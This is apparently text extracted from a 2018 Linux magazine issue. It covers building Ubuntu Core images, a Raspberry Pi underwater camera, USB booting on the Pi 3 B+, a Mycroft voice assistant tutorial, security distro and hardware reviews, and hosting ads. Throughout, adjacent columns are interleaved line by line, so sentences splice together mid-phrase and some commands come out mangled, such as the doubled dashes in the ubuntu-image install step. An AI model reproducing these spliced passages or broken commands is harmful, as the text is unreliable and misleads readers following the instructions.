system’s filesystem will be transferred should be able to start a new instance. Of course, minimal images are just that –
using the LXD migration API and a new only what you need to get a basic install
container created. This tool can be used running and download additional packages
not just on physical machines, but from – but at only 31MB compressed and 81MB
within VMs like VirtualBox or VMware. uncompressed, the images sure are small.
Another alternative migration path In short, snap packages are easing the
is from a physical machine or VM to process of installing much of the container
OpenStack. This is possible, but slightly toolset, a bang up-to-date LTS distro
more involved. First, selinux needs to be improves the experience after deploying
disabled by editing the /etc/selinux/ a container, and Ubuntu’s own ecosystem
additions help with use of major platforms.
www.linuxuser.co.uk 67
Feature Ubuntu 18.04 LTS
U
buntu Core is a tiny, transactional security issues are addressed even if the Everything in Ubuntu Core is based
version of Ubuntu designed for IoT device is out in the field. Of course, Ubuntu around digitally signed snaps. The kernel
devices, robotics and large Core is free; it can be distributed at no cost driver and device drivers are packaged
container deployments. It’s based on the with a custom kernel, BSP and your own as a snap. The minimal OS itself is also a
super-secure, remotely upgradeable Linux suite of apps. It has unrivalled reliability, snap. Finally, all apps themselves are also
app packages known as snaps – and it’s with transactional over-the-air updates snaps, ensuring all dependencies are tightly
used by a raft of leading IoT players, from including full rollback features to cut the managed. The whole distribution comes in
chipset vendors to device makers and costs of managing devices in the field. at just 350MB, which is smaller than many
system integrators.
Core uses the same kernel, libraries and Below The current release of ROS, ideal for use on Ubuntu Core, is the 11th version: ‘Lunar Loggerhead’
system software as classic Ubuntu. Snaps
for use with Core can be developed on an
Ubuntu PC just like any other application.
The difference with Core is that it’s been
built with the Internet of Things in mind.
That means it’s secure by default –
automatic updates ensure that any critical
expert opinion
Joshua Elsdon, maker behind
the Micro Robots project
“The primary benefit of ROS for me is
that it allows for easy communication
between different software modules,
even over a network. Further, it allows
the community of robotics designers
a core framework on which they can
open source their contributions.”
how to
Build a new Ubuntu Core image for a Raspberry Pi 3
1 2 3
Create a key to sign uploads Register with Ubuntu Store Create a model assertion
Before starting to build the image, Next, you have to register your key To build an image, you need to
you need to create a key to sign with the Ubuntu Store, linking it to create a model assertion. This is
future store uploads. Generate a key that your account. You will be asked to login with a JSON file which contains a description
will be linked to your Ubuntu Store account your store account credentials – use the of your device with fields such as model,
with snapcraft create-key. Confirm the command snapcraft register-key to start architecture, kernel and so on. Base this on
key with snapcraft list-keys. the process. an existing device and tweak as needed.
68
rival platforms despite its rich feature set.
Most importantly, Ubuntu Core supports classic ubuntu 18.04 ubuntu core 18
a huge range of devices, from the 32-bit
ARM Raspberry Pi 1 and 2 and the 64-bit
Qualcomm ARM DragonBoard 410c to Intel’s
latest range of IoT SoCs. Confined applications packages as a snap with
The process of building a custom Ubuntu dependencies
Core image is straightforward. For new
boards, it’s necessary to create a kernel
snap, gadget snap and a model assertion.
Otherwise, the process involves registering
4 5 6
Sign the model assertion Build your image Flash and test your creation
Now you need to sign the model Create your image with the You’re now ready to flash and test
assertion with a key. This outputs ubuntu-image tool. The tool your image! Use a tool such as ‘dd’
a model file, the actual assertion document is installed as a snap via snap install or GNOME Multi Writer to write the image
you will use to build your image. Use the --beta ----classic ubuntu-image. Then to a SD card or USB stick and boot it in
command cat pi3-model.json | snap use: sudo ubuntu-image -c beta -O pi3- your device. You’ll be prompted for a store
sign -k default &> pi3.model. test pi3.model. account which downloads the SSH key.
www.linuxuser.co.uk 69
Discover another of our great bookazines
From science and history to technology and crafts, there
are dozens of Future bookazines to suit all tastes
The ESSential guide for Coders & makers
practical
Raspberry Pi
Contents
www.linuxuser.co.uk 71
PiTutorial
Project PipeCam
Minecraft
PipeCam
Using a Pi to keep an eye on the bottom of the ocean
is simpler than you might think – apart from the leaks
S
ometime in 2014, Fred Fourie saw a long- calculations). This freed me up to work on the software
Fred term time-lapse video of corals fighting and electronics.
Fourie with each other for space. That piqued his
interest in the study of bio-fouling, which is Talking of software, what is the PipeCam running?
the accumulation of plants, algae and micro-organisms I use Raspbian Lite as my base OS. I load up apache2
Fred is an such as barnacles. Underwater documentaries such by default on most projects so I can host ‘quick look’
electronics as Chasing Coral and Blue Planet II further drove diagnostic pages as I tinker. On the PipeCam I installed
technician for an his curiosity, and, inspired by the OpenROV project, i2c-tools to set up my hardware clock to keep track of
engineering firm Fred decided to build an affordable camera rig using time on longer deployments. I set up my USB drives to
in Cape Town, inexpensive and easily sourceable components. This be auto-mounted to a specific location. For this
South Africa, that he later dubbed PipeCam; head to the project’s page I use the blkid to the drive information, and then add
specialises in (https://hackaday.io/project/21222-pipecam-low-cost- them to the system by editing the /etc/fstab with the
marine sciences. underwater-camera) to read detailed build logs and drive details and desired location. The main script is
view the results of underwater tests. written in Python, as it’s my home language. The script
Like it? checks which drive has enough space to record, and
Are power and storage two of the most crucial depending on the selected mode (video or photo) it then
Fred has done elements for remote builds such as the PipeCam? starts the recording or photo-taking process. The script
construction It has been a bit of an ongoing challenge. Initially, outputs some basic info which I log from the cron call,
projects in the I wanted to solve my power issues by making the which is where I set up my recording interval. It’s not
Antarctic and PipeCam a tethered system, but difficulties in getting complicated stuff.
has worked on
space weather on Any particular reason for using the Raspberry Pi?
remote islands. I know my way around a Linux system far better than
He gets excited Without a good I know microcontrollers. The familiarity of the Pi
about biological environment made quick setup and experimentation
sciences and large underwater housing the possible. Also, the community support is excellent.
datasets. Follow
his adventures on project is… well, literally How do you plan to extend the project?
Twittter at So far the results have been pretty promising.
@FredFourie. dead in the water Ultimately the next iteration will aim to increase user-
friendliness and endurance. To achieve this there are
Further three sets of modifications I aim to add:
reading a cable into the watertight hull made me turn to a self- • Make use of the Pi’s GPIO to add settings buttons
contained, battery-powered unit. In the first iterations, • Host a user interface webpage on the Pi itself, for
Fred is interested I had a small rechargeable lead acid battery and a system health checks
in areas where Raspberry Pi 3, but the current version sports a Pi Zero • Integrate some battery monitoring with use of current-
the natural world with a Li-ion power bank. This gives me more than five and voltage-sensing circuits, with an light dependent
and electronics times the power capacity for a reasonable price. With resistor (LDR) to determine if there’s enough light to
meet. He’s also regards to storage space, I’ve opted for a small bare- take a picture.
been tinkering bones USB hub to extend the space with flash drives.
with machine There are a few nice Raspberry Pi Zero HATs for this. Could you explain the Fritzing schematic you’ve shared
learning and on the project page?
object detection What was the most challenging part of the project? The next iteration is all about reducing the power used
and suggests Definitely the underwater housing: I had many leaks. in idle times. In the circuit you can see that the main
there might be The electronics are all off-the-shelf and the online power to the Raspberry Pi is controlled via a relay from
some crossover communities has made finding references for the a Arduino Nano. The Nano takes inputs from a current
in the future software that I wrote a breeze, but without a good sensor, voltage sensor and LDR, and decides from these
with using object underwater housing the project is… well, literally inputs whether the Pi should be switched on. In addition
detection. Follow dead in the water. As of the start of the year I got a to the RTC on the Pi, you’ll also see a BME280 breakout
his projects at friend onboard, Dylan Thomson, to help me with the board to monitor pressure, temperature and humidity,
https://hackaday. mechanical parts of the project. Dylan has a workshop to detect changes associated with leaks. There’s also a
io/FredWFourie. with equipment to pressure-test housings (and my slide switch to select video or photo mode.
72
Floating brain
Fred first used a Pi 3 and Waterproof chassis
then a Pi 2 before switching The PVC pipe and the end
to the Pi Zero to reduce caps protect the electronics
power consumption. A cron from the elements. The leak-
job on the Pi calls a Python proof housing has a 10mm
script to check available Perspex lens that withstands
space on the attached USB four bars of pressure.
drives, and if all’s okay,
it then snaps a picture or
records a video.
Fuel
The system currently has no real power
management, which Fred admits is a
shortcoming that he hopes to remedy
soon using an Arduino Nano. For the
time being, the current configuration
allows for a second power bank.
Components list
n Raspberry Pi Zero
n Raspberry Pi Camera Module v2
n USB Hub pHat
n SanDisk Cruzer Blade USB
Data loggers I spy flash drives
SanDisk Cruzer Blade USB The Raspberry Pi camera module has n Power bank
drives plug into the four-port been giving good results and surprised n On/off toggle switch
USB pHAT. statvfs finds the Fred with its underwater performance. n 10mm Plexiglass/Perspex lens
drive with the most free However, the module, with its fiddly n 110mm PVC waste pipe
space every time time the ribbon, isn’t very robust and he fried one n 110mm PVC screw-on end cap
cron job calls on the script. during his tests. n 110mm PVC stop-end
1 2 3
www.linuxuser.co.uk 73
Tutorial Pi 3 B+: USB Booting
microSD card
USB 2.0, and there’s also improved thermal management.
Additional improvements have also been made to booting
from a USB mass-storage device, such as a flash drive or
03 Write the OS to the SD card
Now, write the .img image to the SD card. An
easy method to do this is with Etcher, which can be
hard drive. downloaded from https://etcher.io. Insert your SD card
USB storage This tutorial explains how to take such a device into your computer and wait for it to load. Open Etcher
device and boot up your Raspberry Pi 3 B+ using it. Once and click the first ‘image’ button, select the location of
everything’s configured, there’s no longer any need to the .img file, then click the ‘select drive’ button and select
use an SD card – it can be removed and used in another the drive letter which corresponds to the SD card. Finally,
Raspberry Pi. The benefits of this are that you can click the ‘Flash!’ button to write the image to the card.
increase the overall storage size of the Pi from a standard
4GB-8GB to upwards of 500GB. A further benefit is that
the robustness and reliability of a USB storage device
is far greater than an SD card, so this increases the
04 Write the OS to the USB device
We now need to write the same Raspbian OS
image to your USB storage device. You can use the same
longevity of your data. .img image that you downloaded in step two. Ensure that
Before you begin, please note that this setup is you have ejected the SD card and load Etcher. Attach the
still experimental and is developing all the time. Bear USB storage and once loaded, select the relevant drive
in mind too that it doesn’t work with all USB mass- from the Etcher menu. Drag the .img image file across
storage devices; you can learn more about why and view as you did in step four. While that’s writing, place the SD
compatible devices at www.raspberrypi.org/blog/pi-3- card into you Raspberry Pi and boot it up ready for the
booting-part-i-usb-mass-storage-boot. next step.
01 How it works
This setup involves booting the Raspberry Pi
from the SD card and then altering the config.txt file
in order to set the option to enable USB boot mode. This
in turn changes a setting in the One Time Programmable
(OTP) memory in the Raspberry Pi’s system-on-a-chip,
and enables booting from a USB device. Once set you can
remove the SD card for good. Please note that that any
changes you make to the OTP are permanent, so ensure
that you use a suitable Raspberry Pi – for example, one
that you know will always be able to be hooked up to the
USB drive rather than one you might take on the road.
74
05 What’s new
With the release of the new Raspberry Pi 3 B+
the operating system was also updated. This features
an upgraded version of Thonny, the Python editor, as
well as PepperFlash player and Pygame Zero version
1.2. There’s also extended support for larger screens.
To use that, from the main menu select the Raspberry vcgencmd otp_dump | grep 17 then press Enter. If the
Pi configuration option. Navigate to the System tab and OTP has been programmed successfully, 17:3020000a will
locate the ‘Pixel Doubling’ option. This option draws be displayed in the Terminal. If it’s any different, return to
every pixel on the desktop as a 2x2 block of pixels, which step 7 and re-enter the line of code.
makes everything twice the size. This setting works well
with larger screens and HiDPI displays.
09 Boot from the USB storage device
This completes the configuration of the OTP.
www.linuxuser.co.uk 75
Tutorial Mycroft: DIY voice assistant
Resources
Mycroft
https://mycroft.ai/
get-mycroft
Raspberry Pi 3
microSD card,
8GB or larger
USB microphone
Speakers
Etcher
https://etcher.io
Above Mycroft Mark II, expected in December this year, looks like being an impressive piece of hardware
76
flash the downloaded Picroft image to an SD card. Plug Now that we’ve paired with Mycroft.ai, we can go to
your microSD card into your computer, launch Etcher and the Settings menu where you can select a male or female
select the Picroft image. Then flash it! voice, the style of measurement units you want to use,
and your preferred time/date formats.
02 Set it up
Plug your microSD card back into your Raspberry
Pi and connect it to a power source. The easiest way to
If you’re concerned about privacy, you may want to
keep the Open Dataset box unticked. Keep in mind,
though, that selecting this option is a good way of
get everything working is to connect your Pi to the local contributing useful data to the open source project and
network via the Ethernet port. If you do need to use thus improving the performance of Mycroft in the future,
Wi-Fi, look out for an SSID called MYCROFT; the default assuming your voice assistant isn’t in a particularly
password is 12345678. confidential environment.
Once everything is connected, you’ll want to either
plug in a monitor and keyboard, or connect via SSH to
do this headlessly. Whether via Ethernet or Wi-Fi, once
your device is connected you’ll need to visit http://home.
mycroft.ai to start the setup process. You’ll need to
sign in with Google, Facebook or GitHub, or create a new
Mycroft account; given that part of the reason for this
project is to protect your data from being shared with big
corporations, the latter might be advisable!
04 Connect to Picroft
SSH into your Picroft and you’ll be taken straight
into the Mycroft CLI screen. Usually, this is quite useful,
avoid confusing the Picroft. This is almost certainly why
“Hey Google” or “Okay Google” are used on Google Home,
rather than just “Google”; it’s to avoid said devices picking
but while we get things set up we want to exit that screen up on random conversations, something which happened
using Ctrl+C to reach a normal command prompt. Here quite a lot in our testing.
you’ll want to do some basic setting-up. First, change You can also switch the text-to-speech engine from
the password: type passwd and follow the prompts. Then Mycroft’s Minic engine to Google’s own. This will change
change the Wi-Fi network settings: the voice you hear to that of Google Home, which is
arguably much smoother.
sudo nano /etc/wpa_supplicant/wpa_supplicant.
conf
www.linuxuser.co.uk 77
Tutorial Mycroft: DIY voice assistant
Mycroft,
send help
Hey Butler, set an alarm for X am.
Hey Butler, record this.
Hey Butler, what is [insert search term].
09 Play music
The only officially supported music-playing app
seems to be mopidy, which we had great difficulty in
Hey Butler, tell me a joke. getting working. Hours of fiddling with dependencies and
Hey Butler, go to sleep. an extended deadline later, we still had no luck. However,
There’s an active Hey Butler, read the news. we did find spotify-skill in the GitHub repository, which
community on Hey Butler, set a reminder. works a treat.
GitHub ready to help Hey Butler, do I have any reminders? Simply by copying the GitHub URL (https://github.com/
with help requests, Hey Butler, increase/decrease volume forslund/spotify-skill) into the ‘Skill URL’ box on Mycroft.
which will come in Hey Butler, what’s the weather like? ai and ticking ‘Automatic Install’, moments later we had
handy as Picroft a new menu option to input our Spotify details. Then
spits out quite a few You can also skip our earlier step of using nmap or arp “Hey Mycroft, Play Spotify” loads up our most recent
Python 2.7 errors by asking “Hey Butler, what is my IP address?”. playlist. The only problem was that we couldn’t figure
when Skills refuse to out a way to stream directly to the Mycroft; spotify-skill
load properly… only streams music to another Spotify Connect device.
It’s only speculation on our part, but we assume this is
something to do with licensing restrictions for ‘official’
Spotify devices.
08 Adding Skills
Of course, the default abilities are all well and
good, but surely where an open source program comes
threw up PHP errors, which are visible in the Picroft
command line interface and log viewer. It seems as if
Skills are very hit-and-miss at the moment. There is a
into its own is with customisation. Mycroft/Picroft is no ‘status’ column for each one on the community page
different in this regard, with a whole range of different which is meant to indicate its readiness, but we found the
voice abilities available. These seem to have been coined results to be inconsistent.
‘Skills’ – we can thank Amazon for that.
Back at Mycroft.ai, it’s time to explore the Skills menu.
There’s an option to paste a GitHub URL to install a Skill,
which is quite useful, but Mycroft does also recognise
“install [name of Skill]” as a command. You’ll see a link to
a list of community-developed Skills, where you can also
find the names and command needed to install them.
“install YouTube” adds a simple YouTube streaming Skill,
for example.
78
11 Replacing commercial voice assistants
While the Picroft has been a fun experiment to
sink (way too many) hours into, do we think it’s ready for
prime time? In a word: no. While the core experience may
be fine, it’s extremely limited and the Skills are not yet up
to scratch. In our experience, they’re just not very likely to
work, even after hours of fiddling.
If you’re looking for a new hobby and don’t mind putting
a few days into this, you’ll get some enjoyment out of it.
However, if you’re looking for a new voice assistant to
read you the news, wake you up and play your favourite
music or radio station, we’re still forced to recommend
one of the commercial units. Having said that, Mycroft
Mark II is available to reserve on IndiGogo right now too.
12 Testing
It may be that Mycroft’s voice recognition isn’t up
to scratch, or it may be that the microphone we used for
testing was cheap and useless, but constantly issuing
commands via voice during the testing process proved
to be tiring. Fortunately, Mycroft supports text-based
commands, too.
If you SSH into your Picroft you can type text
commands directly into the command-line interface. If Above Mycroft Mark I
you exit out of the CLI, there are a number of command Other versions of Mycroft comes with speakers
prompts available: At the moment Mycroft is available in several and mic built-in
mycroft-cli-client A command line client, useful flavours. The version we’re looking at here,
for debugging technically known as Picroft, consists of the
msm Mycroft Skills Manager, to install new Skills free software only – you’ll need to add your own
say_to_mycroft Use one-shot commands via the Raspberry Pi to run it, plus speakers and a mic.
command line If you prefer an off-the-shelf version, you can opt
speak Say something to the user for the Mycroft Mark I ($180), a standalone hardware
test_microphone Record a sample and then play it back device which is equally ‘hackable’ in terms of adding
to test your microphone. abilities or changing code. Finally, there’s Mycroft for
Linux, which you need to install using either a shell
13 Becoming a supporter
Mycroft offers an optional subscription service,
at $1.99 per month or $19.99 for a year. While the
script or a standalone installer. Mycroft AI describes
this as “strictly for geeks”.
www.linuxuser.co.uk 79
Not your average technology website
www.gizmodo.co.uk
twitter.com/GizmodoUK facebook.com/GizmodoUK
81 Group test | 86 Hardware | 88 Distro | 90 Free software
Subgraph OS Whonix
Group test
Security distributions
Use one of these specialised builds that go one step further than
your favourite distribution’s security policies and mechanisms
www.linuxuser.co.uk 81
Review Security distributions
n Kodachi enables you to use your own VPN instead of Kodachi’s and will n Qubes OS has an easy to follow installer, but it is a complicated distro
ban users who misuse their VPN for things such as hosting illegal torrents and you need to learn the ropes. (See LU&D189 p60 for a detailed guide.)
Overall Overall
8 7
Kodachi uses Firejail to sandbox apps and isn’t Qubes compartmentalises the entire Linux
very easy to install. But its collection of privacy- installation into Xen-powered virtual domains.
centred tools and utilities that help you remain This arrangement ensures that a compromised app
anonymous when online is unparalleled. doesn’t bring down the entire installation.
82
Subgraph OS Whonix
Manages to successfully tread the A ready-to-use OS that’s available as
line between usability and security two KDE-powered virtual machines
n You can use the intuitive Subgraph Firewall to monitor and filter n The iptables rules on the Whonix-Workstation force it to only connect to
outgoing connections from individual apps the virtual internet LAN and redirect all traffic to the Whonix-Gateway
Overall Overall
8 8
Subgraph goes to great lengths to ensure Whonix is a desktop distro that’s available as two
everything from the kernel to the userland utilities separate VMs. It ensures security and privacy
aren’t exploitable. It also bundles a host of privacy- by using a virtualisation app to isolate the work
centred apps along with mainstream desktop apps. environment from the one that faces the internet.
www.linuxuser.co.uk 83
Review Security distributions
84
Never miss an issue US offer
*
& get 6 issues free
FREE DVD TRY 2 UBUNTU SPINS
www.linuxuser.co.uk
LINUX USER & DEVELOPER ISSUE 186
ULTIMATE
INTERVIEW
subscribers
Vivaldi
The web browser for IN-DEPTH GUIDE
Linux power users The future of
programming
The hot languages
to learn
PRACTICAL PI
Build an AI assistant
Python & SQLite PAGES OF
Micro robots! GUIDES
> MQTT: Master the IoT protocol
> Security: Intercept HTTPS
www.linuxuser.co.uk
The distro for creators, 4 Linux distributions for » Java: Spring Framework
developers and makers entering the world of Arch » Disaster relief Wi-Fi
Install today!
usn 2
b
ubuntu Mate
traditional desktop metaphor
ContaIners
.0
MX lInuX 17.1
viruses and spyware. We do still recommend % +44 (0)1225 442244 your PC manufacturer’s
that you run a virus checker over this disc Website: www.linuxuser.co.uk instructions. Thanks for
before use. Future Publishing Limited cannot Subscriptions supporting Future Publishing.
guarantee that at the time of use, hyperlinks Subscribe to Linux User & Developer today! 2018 Future Publishing Ltd.
direct to that same intended content, as Future
Publishing has no control over the content % UK 0844 249 0282
free with
delivered by these hyperlinks. Unless otherwise Overseas +44 1795 419161
issue 191
Email: [email protected]
stated, all software on this disc is distributed
in accordance with the GNU General Public 6-issue subscription (UK) – £32 a fast, friendly and stable linux distribution
13-issue subscription (Europe) – €88
License. For more information on the GNU GPL
loaded with an exceptional bundle of tools
THE MAgAzInE for
THE Gnu GeneratIon
Pros
Offers a strong enclosure,
easy installation and a
powerful platform that’s
quiet in operation.
Cons
No drive locks supplied
and a combination of
limited application
selection and generally
poor app support.
Summary
Solid enough
construction and
hardware design
(if you like rounded
silver surfaces) can’t
TerraMaster
overcome the lack of
attention given to the
operating system and
applications. Poor docs,
limited apps and CPU
Hardware power that is
7
difficult to use are
86
Pros
An affordable price for
a wireless router that
is WISP-capable, while
still being being highly
portable for travellers.
Cons
Needs a carry pouch, and
the manufacturer needs
to address the captive
portals restriction for it to
be almost perfect.
Summary
This compact travel
router is inexpensive,
easy to carry and
deploy. It also supports
WISP technology for
Trendnet
www.linuxuser.co.uk 87
Review MX Linux 17.1
Distro
MX Linux 17.1
A joint effort of two popular projects, this elegant
distribution is steadily gaining in popularity
The MX Linux project is a joint effort between the the disk automatically if you want MX Linux to take
antiX and MEPIS communities, and the distribution over the entire disk; dual-booters and advanced
they produce uses some modified components users will have to use Gparted to manually partition
Specs from both projects. MX Linux is also popular for its the disk. Advanced users will appreciate the option
CPU i686 Intel or AMD stance of sticking with sysvinit instead of switching to control the services that start during boot, while
processor over to systemd. new users can press ahead with the defaults. If
Graphics Video adaptor and The distribution uses a customised Xfce for a you’ve made any modifications to the desktop in the
monitor with 1,024x768 dapper-looking desktop that performs adequately Live environment, you can ask the installer to carry
or higher resolution even on older hardware. MX Linux ships as a Live these over to the installation, which is a nice touch.
RAM 512MB environment and uses a custom installer verbose The desktop boots to a welcome screen that
Storage 5GB enough to explain what’s going on with the various contains useful links to common tweaks and the
License GPL and various steps. The installer also uses reasonable defaults distribution’s set of custom tools. The installation
Available from that’ll help first-timers sail through the installation. also includes a detailed 172-page user’s manual and
https://mxlinux.org The partitioning screen offers the option to partition you can access other avenues of help and support,
88
Above MX Linux very responsibly notifies users when a program is started with root permission without it prompting the user
Pros
Advanced users will appreciate the option to control the The custom package
manager with its list of
services that start during boot, while new users can press curated packages and
custom MX Tools.
ahead with the defaults
including forums and videos, on the project’s that will only install available updates. In the latest Cons
website. The clean, iconless desktop displays basic 17.1 release, the update utility has new options to The hassle of backing up
system information via an attractive Conky display. enable unattended installations using either of data and a fresh install
Also by default, the Xfce panel is pinned to the left these mechanisms. whenever MX switches to
side of the screen and uses the Whisker menu. The update utility is part of the distribution’s set a new Debian Stable.
MX Linux’s default collection of apps doesn’t of custom tools designed to help users manage their
disappoint, as it includes everything to fulfill the installation. These are housed under the MX Tools
requirements of a typical desktop user. In addition dashboard and cover a wide range of functionality, Summary
to a host of Xfce apps and utilities, there’s Firefox, including a boot-repair tool, a codecs downloader, a MX Linux is a
Thunderbird, LibreOffice, GIMP, VLC, luckyBackup, utility to manipulate Conky, a Live USB creator, and a wonderfully built
and more. MX is built on the current Debian Stable snapshot tool for making bootable ISO images of the distribution that
release but updates a lot of apps and back-ports working installation. scores well for looks
newer versions from Debian Testing. The only One of the tools you’ll be using quite often is and performance. The
downside of this arrangement is that you’ll have to the MX Package Installer, which has undergone highlight is its custom
do a fresh install of MX Linux when the distribution a major rewrite in the 17.1 release. The installer tools that make regular
switches to a new Debian Stable release. includes popular applications from the Debian admin tasks a breeze.
An icon in the status bar announces available Stable repositories along with packages from Debian The package manager,
updates; you can click it to open the update utility, Testing. It also lists curated packages that aren’t and the remastering
which works in two modes. The default is the full in either repositories but which have been pulled and snapshot
upgrade mode, which is the equivalent of dist-
upgrade and will update packages and resolve
dependencies even if its requires adding or removing
from the official developers’ websites or other
repositories, and have been configured to work
seamlessly with MX Linux.
tools also deserve
a mention. 9
new packages. There’s also a basic upgrade mode Mayank Sharma
www.linuxuser.co.uk 89
Review Fresh free & open source software
Desktop search
Media manager
90
Programming Language
Screencast recorder
SimpleScreenRecorder 0.3.10
Record and share desktop screencasts with ease
This app’s name is actually something
of a misnomer. It’s flush with features
and tweakable parameters, and gives
its users a good amount of control over
the screencast. SSR can record the entire screen
and also enables you to select and record particular
windows and regions on the desktop.
It uses a wizard-like interface and each step of the
process has several options. All these have helpful
tooltips that do a wonderful job of explaining their
purpose. In addition to selecting the dimensions of
the screen recording, you can also scale the video
and alter its frame rate.
The next screen offers several options for
selecting the container and audio and video codecs
for the recording, as well as a few associated
settings. SSR supports all the container formats that
are supported by the FFmpeg and libav libraries, Above If you want, you can pass additional options via CLI parameters and save them as custom
including MKV, MP4, WebM, OGG as well as a host profiles for later use
of others such as 3GP, AVI and MOV. You can also
choose codecs for the audio and video stream
separately, and preview the recording area before Pros Cons Great for...
you start capturing it. A well-documented Lacks some options Making quick screencasts
While it’s recording, the application enables you to interface that’s easy to use offered by its peers, such in all popular formats.
keep an eye on various recording parameters, such but still manages to pack as the ability to record a http://www.maartenbaert.
as the size of the captured video. in a lot of parameters. webcam with the desktop. be/simplescreenrecorder
www.linuxuser.co.uk 91
Get your listing in our directory
Web Hosting To advertise here, contact Chris
[email protected] | +44 01225 68 7832 (ext. 7832)
recommended
Hosting listings
Featured host: Netcetera is one of
www.netcetera.co.uk Europe’s leading Web
03330 439780 Hosting service providers,
with customers in over 75
countries worldwide
About us
Formed in 1996, Netcetera is one of IT infrastructure provider offering
Europe’s leading web hosting service co-location, dedicated servers and
providers, with customers in over 75 managed infrastructure services to
countries worldwide. It is a leading businesses worldwide.
What we offer
• Managed Hosting • Cloud Hosting
A full range of solutions for a cost- Linux, Windows, hybrid and private
effective, reliable, secure host cloud solutions with support and
• Dedicated Servers scaleability features
Single server through to a full racks • Datacentre co-location from quad-
with FREE setup and a generous core up to smart servers, with quick
bandwidth allowance setup and full customisation
92
SSD web hosting
Supreme hosting
www.bargainhost.co.uk
www.cwcs.co.uk 0843 289 2681
0800 1 777 000
Since 2001, Bargain Host has
CWCS Managed Hosting is the UK’s campaigned to offer the lowest-priced
leading hosting specialist. It offers a possible hosting in the UK. It has
fully comprehensive range of hosting achieved this goal successfully and
products, services and support. Its built up a large client database which
highly trained staff are not only hosting includes many repeat customers. It has
experts, it’s also committed to delivering also won several awards for providing an
a great customer experience and is outstanding hosting service.
passionate about what it does.
• Shared hosting
• Colocation hosting • Cloud servers
• VPS
• 100% Network uptime Enterprise • Domain names
www.linuxuser.co.uk 93
Free Resources
Welcome to Filesilo!
Download the best distros, essential FOSS and all
our tutorial project files from your FileSilo account
what is it?
Every time you
see this symbol
in the magazine,
there is free
online content
that's waiting
to be unlocked
on FileSilo.
why register?
• Secure and safe 1. unlock your content 2. enjoy the resources
online access,
from anywhere Go to www.filesilo.co.uk/linuxuser and follow the You can access FileSilo on any computer, tablet or
instructions on screen to create an account with our smartphone device using any popular browser. However,
• Free access for secure FileSilo system. When your issue arrives or you we recommend that you use a computer to download
every reader, print download your digital edition, log into your account and content, as you may not be able to download files to other
and digital unlock individual issues by answering a simple question devices. If you have any problems with accessing content
based on the pages of the magazine for instant access to on FileSilo, take a look at the FAQs online or email our
• Download only the extras. Simple! team at [email protected].
the files you want,
when you want
94
Log in to www.filesilo.co.uk/linuxuser
tutorial code
Get into the container business with our
example scripts, Dockerfiles, Ansible
playbook samples and Puppet manifests.
NEXT ISSUE ON SALE 3 May
Short story Stephen Oram Master the Cloud | Unsolvable computing problems | Nextcloud for biz
Facebook: Twitter:
follow us facebook.com/LinuxUserUK @linuxusermag
near-future fiction
96
The source for tech buying advice
techradar.com
9000